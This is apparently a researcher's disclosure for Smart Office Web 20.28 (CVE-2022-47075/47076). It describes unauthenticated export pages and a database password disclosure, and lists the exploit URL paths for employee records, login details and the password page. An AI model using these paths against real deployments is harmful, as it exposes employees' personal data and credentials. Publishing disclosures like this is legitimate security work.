Smart Office Suite- Unauthenticated Data Ex

Vulnerable Software: Smart Office Web

Vulnerability: Unauthenticated Data Export and Database Password Disclosure

Affected Version: 20.28

Fixed Version: No Fix Available

Vendor Homepage: https://smartofficepayroll.com/

CVE: CVE-2022-47075 and CVE-2022-47076

CVE Author: Tejas Nitin Pingulkar

Exploit Available: POCExploit 

About Affected Software

Meant for companies with a presence in multiple locations, and usage is required at multiple places. Also suitable for those companies who would like to maintain their data at a centralized location and on their premises.

Features like Employee Self Service and Mobile are more beneficial in this setup since these can be accessed from anywhere and anytime, enabling efficiency and real-time solutions.

Benefit – Data can be centralized, management becomes easier, better control over permission and data, and Can be accessed from any time and anywhere.

Exploit

To exploit, use the following

Function Exploit URL POC Reference
Export Employee Details [IP]:[port]/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails Images 1 & 2
Export Reporting Manager [IP]:[port]/ExportReportingManager.aspx Images 3 & 4
Export Employee Other Details [IP]:[port]/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails Images 5 & 6
Export Employee Login Details [IP]:[port]/ExportEmployeeLoginDetails.aspx Images 7 & 8
Database Password Disclosure (CVE-2022-47076 ) [IP]:[PORT]/DisplayParallelLogData.aspx Image 9

POC:

CVE-2022-47076

 

Smart Office Suite- Unauthenticated Data Ex

2 thoughts on “Smart Office Suite- Unauthenticated Data Ex

Leave a Reply

Your email address will not be published. Required fields are marked *

Scroll to top